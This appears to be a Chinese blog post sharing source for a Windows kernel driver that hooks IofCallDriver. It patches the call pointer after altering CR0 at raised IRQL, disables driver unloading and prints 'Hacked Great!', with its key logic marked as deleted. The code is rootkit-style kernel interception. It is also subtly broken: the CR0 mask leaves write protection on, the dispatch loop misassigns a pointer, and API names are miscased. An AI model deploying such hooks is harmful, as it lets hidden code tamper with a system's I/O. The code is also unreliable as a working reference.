21Feb

irpHook的代码~

Posted in 所谓技术 by gleon
  1. NTSTATUS FASTCALL
  2. NewpIofCallDriver(
  3. IN PDEVICE_OBJECT DeviceObject,
  4. IN OUT PIRP Irp
  5. )
  6. {
  7. NTSTATUS stat;
  8. DbgPrint("Hacked Great!");
  9. //Code deleted
  10. __asm
  11. {
  12. mov ecx,DeviceObject
  13. mov edx,Irp
  14. Call old_piofcalldriver
  15. mov stat,eax
  16. }
  17. return stat;
  18. }
  19. NTSTATUS DriverIoControl(
  20. IN PDEVICE_OBJECT DeviceObject,
  21. IN PIRP Irp)
  22. {
  23. PIO_STACK_LOCATION pisl;
  24. NTSTATUS ns = STATUS_UNSUCCESSFUL;
  25. ULONG BuffSize, DataSize;
  26. PVOID pBuff, pData,pInout;
  27. KIRQL OldIrql;
  28. ULONG i;
  29. pisl = IoGetCurrentIrpStackLocation (Irp);
  30.  
  31. BuffSize = pisl->Parameters.DeviceIoControl.OutputBufferLength;
  32.  
  33. pBuff = Irp->AssociatedIrp.SystemBuffer;
  34.  
  35. Irp->IoStatus.Information = 0;
  36. switch(pisl->Parameters.DeviceIoControl.IoControlCode)
  37. {
  38. case IOCTL_DISABLE:
  39. {
  40. //Code deleted
  41. ns = STATUS_SUCCESS;
  42. break;
  43. }
  44. case IOCTL_ENABLE:
  45. {
  46. //Code deleted
  47. ns = STATUS_SUCCESS;
  48. break;
  49. }
  50. }
  51.  
  52. Irp->IoStatus.Status = ns;
  53. IoCompleteRequest(Irp, IO_NO_INCREMENT);
  54. return ns;
  55. }
  56.  
  57. NTSTATUS DrivercreateClose(
  58. IN PDEVICE_OBJECT DeviceObject,
  59. IN PIRP Irp)
  60. {
  61. Irp->IoStatus.Information = 0;
  62. Irp->IoStatus.Status = STATUS_SUCCESS;
  63. IoCompleteRequest(Irp, IO_NO_INCREMENT);
  64. return STATUS_SUCCESS;
  65.  
  66. }
  67.  
  68. VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
  69. {
  70. IodeleteSymbolicLink(&SymbolicLinkName);
  71. IodeleteDevice(deviceObject);
  72. }
  73. NTSTATUS DriverClose(
  74. IN PDEVICE_OBJECT DeviceObject,
  75. IN PIRP Irp)
  76. {
  77. return DrivercreateClose(DeviceObject,Irp);
  78. }
  79. NTSTATUS IoComplete(
  80. IN PDEVICE_OBJECT DeviceObject,
  81. IN PIRP Irp)
  82. {
  83. IoCompleteRequest(Irp,IO_NO_INCREMENT);
  84. return STATUS_SUCCESS;
  85.  
  86. }
  87.  
  88. void HookpIofCallDriver()
  89. {
  90. KIRQL oldIrql;
  91. ULONG addr = (ULONG)IofCallDriver;
  92. __asm
  93. {
  94. mov eax,addr
  95. mov esi,[eax+2]
  96. mov eax,[esi]
  97. mov old_piofcalldriver,eax
  98. }
  99. oldIrql = KeRaiseIrqlToDpcLevel();
  100. __asm{
  101. mov eax,cr0
  102. mov oData,eax
  103. and eax,0xffffffff
  104. mov cr0,eax
  105. mov eax,addr
  106. mov esi,[eax+2]
  107. mov dword ptr [esi],offset NewpIofCallDriver
  108. mov eax,oData
  109. mov cr0,eax
  110. }
  111. KeLowerIrql(oldIrql);
  112. return ;
  113. }
  114. NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,
  115. IN PUNICODE_STRING RegistryPath)
  116. {
  117. NTSTATUS status;
  118. PDRIVER_DISPATCH *ppdd;
  119. ULONG i;
  120. PCWSTR dDeviceName = L"\\Device\\irphook";
  121. PCWSTR dSymbolicLinkName = L"\\DosDevices\\irphook";
  122.  
  123. RtlInitUnicodeString(&DeviceName, dDeviceName);
  124. RtlInitUnicodeString(&SymbolicLinkName, dSymbolicLinkName);
  125. status = IocreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, &deviceObject);
  126. if (!NT_SUCCESS(status)) return status;
  127. status = IocreateSymbolicLink(&SymbolicLinkName, &DeviceName);
  128. #ifdef DEBUG
  129. DriverObject->DriverUnload = DriverUnload;
  130. #endif
  131. DriverObject->DriverUnload =0;
  132. ppdd = DriverObject->MajorFunction;
  133. for(i =0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
  134. ppdd = IoComplete;
  135.  
  136. ppdd [IRP_MJ_create] = DrivercreateClose;
  137. ppdd [IRP_MJ_DEVICE_CONTROL ] = DriverIoControl;
  138. g_drvobj = DriverObject;
  139. HookpIofCallDriver();
  140. return status;
  141. }

Leave a Reply